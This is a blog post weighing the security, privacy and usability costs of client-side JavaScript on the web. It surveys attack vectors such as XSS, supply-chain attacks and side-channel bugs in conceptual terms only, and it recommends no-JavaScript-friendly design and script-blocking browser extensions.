Risks of client-side scripting

JavaScript logo in a cup
Image by 'Cowboy' Ben Alman / CC BY-NC-ND 2.0

The web has evolved from serving simple non-interactive HTML documents to fully branded and dynamic web applications. But what are the risks and costs of downloading and executing foreign code on your PC? Should we use this style of building websites even for blogs?

Client-side scripting vs server-side scripting

Originally web was built with web servers serving static HTML files. To change the content of the served document, a webmaster would upload the new files to the web server from which they were served to visitors browsers and rendered on their screens.

This approach was very limited and more methods of handling of dynamically changing content - often using user-submitted data (User-generated content) - were developed. A Common Gateway Interface specification was defined and used to integrate custom programs (or scripts) running on the server with the web server daemon for it to serve HTML and other media generated on the fly by the script. Later many stand-alone HTTP application server technologies were developed. These application servers would handle the HTTP protocol themselves. Applications hosted this way would usually connect to an SQL database to store and retrieve data for each client request.

All of this can be called server-side scripting and is still the main way to serve dynamic content on the web.

Later with increased capabilities of the web browsers for running server provided scripts, a new trend emerged. With client-side executed scripts coded in JavaScript language, a page could become more interactive. It would be able to fetch data on demand from the web server using HTTP API. Single page web applications became popular. Server-side scripts are used to only provide data for scripts running in the browser which would build the whole HTML document on the fly.

Browsers grew to support many Web APIs accessible from JavaScript that converted browsers into fully blown operating system abstraction layer.

More recently a new technology, called WebAssembly, emerged to liberate client-side scripting. It provides a way for many more programming languages to target the browser. This technology is less resource-intensive and more secure by design compared to JavaScript and allows novel applications to be created for the web browser.

In this post, I would like to explore some risks and common issues arising with the wide-spread use of client-side scripting. I will focus on JavaScript since most issues related to it will also apply to WebAssembly.

Benefits of running client-side scripting

When you visit a website your browser may be asked by the server to download arbitrary programs and execute them on your computer. This way the web application developer can drive your browser though interactive behaviours without the need to communicate with the server on every click. For certain types of applications, this may reduce the data transferred between your browser and the server. It may let the browser to perform complex actions like drawing images or producing sounds. Also, it could help to avoid potentially lengthy page re-loads.

Another very important factor that made client-side scripting so successful is that browsers are everywhere and offer a relatively standardised programming environment compared to the native operating systems. If you want to write an application that runs on Windows, Linux, Android, iOS and more you can do it with web technologies. You don't have to worry about Apple taking 30% of your subscription revenue or Google blocking you out from Play store, installers on Windows or binary compatibility with Linux's glibc. People don't need to install anything, they just need the URL which they will hopefully discover via a web search engine. All the code, media and dependencies will be downloaded by the browser automatically and transparently.

Browser as an attack target

Today browsers are a very important tool of our daily digital lives. We use them to get informed, communicate with people, do banking and order food. All these activities require private data to be transferred in and out of the browser, and our selves to be authenticated via the browser to various 3rd parties. This makes your browser a valuable target for an attacker.

Common goals of attackers are:

  • Session cookie values of other visitors of a website - this allows them to impersonate the visitor (log-in as someone else without even knowing the password!).
  • Steal your secrets like credit card details or crypto-currency wallets to later take your money.
  • Steal your electricity and CPU power by running crypto miners to monetize on crypto-currency sale.
  • Access personal information to later sell it or use it in a fraud against you or your family and friends.
  • Post messages from your social media account to spread fake news in your name.
  • Create Botnets to attack other targets.
  • Install Backdoors, Trojans and other types of malware to use later in other ways.
  • Install Ransomware that will encrypt your files until a ransom is paid.
  • Deceive you to download and install malicious software.
  • Hack your home router via web call to insecure LAN-side management server.
  • Use Browser fingerprinting techniques to track you across the internet to build a behavioural profile of you.
  • And many more...

Attack surface

Execution of arbitrary code on your computer is not without risks. Web browser designers try very hard to make sure that any script running within the browser is contained and won't be able to access data beyond what browser will allow it to access. In practice, this is impossible to achieve.

JavaScript interpreter bugs

Every script downloaded by the browser is parsed and executed with JavaScript virtual machine (or WebAssembly runtime environment) that is a component of the browser. These virtual machines are designed in such a way that restricts the running script from accessing arbitrary information on your computer. This is called sandboxing.

In practice, the design and implementation are not perfect. Clever trick may allow script code to access restricted information from the browser or operating system. It may even allow injecting native code to be executed as part of normal browser runtime (Remote Code Execution). This in effect can lead to the compromise of the whole system.

Unfortunately, every few months browser vendors patch their JavaScript virtual machines to fix this kind of issues.

Because of the design of operating systems, an attacker exploiting browser vulnerability (zero-day or e.g. user using old version of the browser) can gain full access to the computer running the browser (user-level access, but gaining administrative access is usually possible). This includes all your information stored on your computer reachable through it.

See also:

Hardware isolation bugs

Meltdown and Spectre attacks were discovered more recently. This types of attacks rely on the execution of untrusted code in a shared environment. While this description fits perfectly the virtual server providers (or could services), this applies as well to JavaScript running in your browser and sharing your CPU with other programs you run and the operating system itself.

Today we have many mitigations in place on CPU microcode level, OS level as well as in the browser JavaScript virtual machines. The problem is that these mitigations are not perfect and researchers keep finding new ways of exploiting similar mechanisms used by attacks like MDS attacks.

From a recent report: "(...) 'certain attacks' can now be mounted remotely using JavaScript in a web browser, and "fill 64-bit registers with an attacker-controlled value in JavaScript by using WebAssembly."".

For more see: Intel, ARM, IBM, AMD Processors Vulnerable to New Side-Channel Attacks

See also: Some Spectre In-Browser Mitigations Can Be Defeated

Design issues in web standards

Web standards consist of a large volume of specifications. Sometimes designers make mistakes and properly implemented standards can be abused for malicious purposes.

Some examples of misused standards and attacks are:

For some recent examples see:

Malicious script delivery vectors

Even if you trust a website to not serve malicious scripts, there are many techniques an attacker can use to get their script served to you without the website owner knowledge.

Ads and ad networks

A typical website will serve ads. Advertiser or advertising network may serve malicious scripts through ads that are part of the website you trust. The website your are visiting is not in control of what scripts are served to your browser - they merely include a script provided by the ad network.

See also: Ad networks owned by Google, Microsoft serve malware

Cross-site scripting

One of the top 10 classes of software vulnerabilities is cross-site scripting (XSS). With this technique, an attacker posts a JavaScript to the vulnerable web server in such a way that the script content is executed by the websites visitor browser as part of the content of the site - e.g. a specially crafted comment in the comment section. Using this technique the attacker can obtain any information that the script is allowed to access from the visitor browser - this often includes session tokens allowing the attacker to later impersonate the visitor on the website without knowing his login credentials.

See also: Dangerous XSS vulnerability found on YouTube

XSS via web cache

Many websites use content delivery networks or own custom data caching strategies to optimize page delivery performance. Subtle inconsistencies in caching can be exploited by attackers to implant JavaScript code into cached responses. This cached response is then served to unsuspecting visitors.

See also: Web Cache Entanglement: Novel Pathways to Poisoning

Supply chain attack

Web application developers often use hundreds of small JavaScript libraries as part of their applications. It is often not feasible that developers inspect all of these libraries for malicious code. A successful supply chain attack can deliver malicious script code through many trusted web applications without being noticed.

See also: PCI and the return of Javascript supply chain attacks

Typosquatting

Typosquatting is another kind of supply chain attack. The developer misspelt the name of a JavaScript library they use and pulled a similarly named but malicious library instead.

See also: JavaScript Packages Caught Stealing Environment Variables

Security issues in foreign code

Even if your browser is fully patched, a script loaded in it can have security issues on its own. Similarly to supply chain attack code of a third-party dependency of the web application can introduce a weakness in the whole application without the developers knowing about it.

See also: The Curious Case of Copy & Paste.

Hacked web servers

A malicious JavaScript code and be put on a hacked webpage in such a way that its actions are not visible for the visitors or website administrators.

See also: Boing Boing was hacked

Downsides of single-page applications

Single-page applications tend to break some fundamental assumptions on how the web works for the visitor.

On the server-side generated website the navigation can be done via the browsers back button. This is often broken for web application and for some apps it can even log you out if used by "mistake".

Another fundamental feature that easily breaks is the links. A web application often use buttons that trigger some code to run on the browser so you cannot copy the link to the page the button leads to. Similarity bookmarking or sharing links form the browser address bar is pointless as this often stays the same no matter where you are in the app. Also visited links are normally rendered differently on the website so you can see what information you already accessed in the past.

Browsers try to keep scroll positions across going back and forth in history consistent between reloads. This helps you to orient yourself in a long page quickly. Unfortunately when content is dynamically loaded this often breaks. It is very annoying for example when you are browsing products in on-line shops.

This issues can be worked around by some extra code and use of history API but it requires extra work. When using the server-side generated website you get this for free.

Browsers provide accessibility features, like keyboard-based navigation. These features are crucial for people that cannot use pointing devices easily. This features work out of the box for plain HTML pages but may easily break with JavaScript generated navigation elements and links.

For the web developer, on the other hand, the issues are:

  • Search engines cannot readily index your web applications content - Google will index HTML content as soon as it discovers it, but will take time to run your scripts to index JavaScript generated content.
  • Content of your application cannot be easily archived (e.g. by archive.org).
  • JavaScript adds extra failure modes which can prevent the website from loading correctly.
  • Typically all application code needs to be downloaded before it can run which may increase the bounce rate.
  • "Generically-designed REST API that tries not to mix "concerns" will produce a frontend application that has to make lots of requests to display a page" - forcing you to join data from multiple tables/API endpoints on the client-side, which is the worst performance-wise place to do it.
  • They can be a resource hog for the client where hardware specification is unpredictable.
  • Non-interactive websites are easier to test.

See also: Second-guessing the modern web

Designing no-JavaScript friendly websites

Progressive fallback

Web standards are designed in such a way to allow progressive fallback from full HTML + CSS + JS stack through to HTML only without loss of content. Sure your website won't look pretty if you strip it of CSS but it should be readable and functional by default... that is unless you work to break this fallback.

This is because the HTML part of the web page is where all content (supposed to) be. Where CSS does add style to it and JavaScript makes it interactive. So taking away later two should leave you with just plain content.

Make your site is such a way that it behaves reasonably well without JavaScript and also without CSS. Doing so will help you find usability issues - not every person on the internet can actually see your website or use a mouse.

See also: CSS Naked Day.

Landing page should be usable without JavaScript

Even if you are designing a web application for which JavaScript is essential, make sure that the landing page does describe what your web application is about before requiring the visitor to turn on JavaScript. Just showing the plain text "This website requires JavaScript" is not going to convince me to allow its scripts to run, but proper description of it functions may.

Use native browser features

Many use cases for JavaScript are actually covered by the HTML standard these days so you might not need JavaScript.

Browsers and extensions to help you mitigate the risk

Firefox

Mozilla has made big mistakes regarding user privacy and is far from perfect in this regards. They are also effectively sponsored by Google even though their many attempts to break free from their monetary influence. But compared to Chrome-based browsers, Firefox has better support for content blockers. This allows extensions like uBlock Origin to block malicious scripts more effectively including first-party trackers compared to similar extensions for Chrome. Google has recently crippled ad-blocking functionality of Chrome extensions while Firefox got built-in tracking protection.

Mozilla has less incentive to push for web application style web standards. Google, in contrast, makes money from privacy invasion, their main products are literally user tracking related (AdSense, Analytics). They push for more use of JavaScript and web applications as a way to isolate themselves from Microsoft Windows - you start Chrome and you don't need Windows application any more as Google has you covered within the browser. So on the long term Chrome being more private and restricting JavaScript use is directly against their business.

Many browsers derive from either Firefox or Chrome. They come with their trade-offs but may be worth looking into. Currently, I use Fennec on my de-Googled Android phone. Do your research.

uBlock Origin

Browser extension uBlock Origin does not only block ads and trackers but also malicious scripts like the one used for port scanning. It works well out of the box and requires little configuration. Most websites will work correctly with it enabled. I highly recommend this plugin for anybody unless you want to use more advanced tools like uMatrix.

NoScript

NoScript is a more invasive browser extension. It blocks all JavaScript scripts by default and lets you decide whenever you trust given domain or not. This way it offers even more protection from websites that do not need to run scripts to function. Inevitably this will render many websites half-broken or unusable until you allow the necessary scripts to run.

uMatrix

uMatrix is an advanced browser extension that implements features of uBlock Origin and NoScript combined. To use it though you need to know what you are doing as default settings are very restrictive of what requests your browser is allowed to make.

LibreJS

LibreJS is another extension that will block some JavaScript form running. "It blocks nonfree nontrivial JavaScript while allowing JavaScript that is free and/or trivial."

So if your focus is on running only free software on your computer you may want to look into this extension.

See also: The JavaScript Trap

Life beyond HTTP

There are other ways of browsing the internet. Protocols like Gemini and Gropher are alternative universes where risks I have described does not apply by design.

Summary

JavaScript-based web applications are a good way to write client components for distributed software. They allow the developer to provide one client-side executable artefact that runs on all five of X11/Linux, macOS, Windows, Android, and iOS. But make sure you know your trade-offs as described here.

If you want to present a content that is indexable, searchable, navigable and readable by default just use plain HTML/CSS and only use JavaScript when otherwise browser is missing a feature that you really need.

When you are browsing the internet make sure you use proper tools to stay safe and encourage safe website designs with your choices and feedback.

Updates to this article

  • 2020-11-11 - Added note about NAT Slipstreaming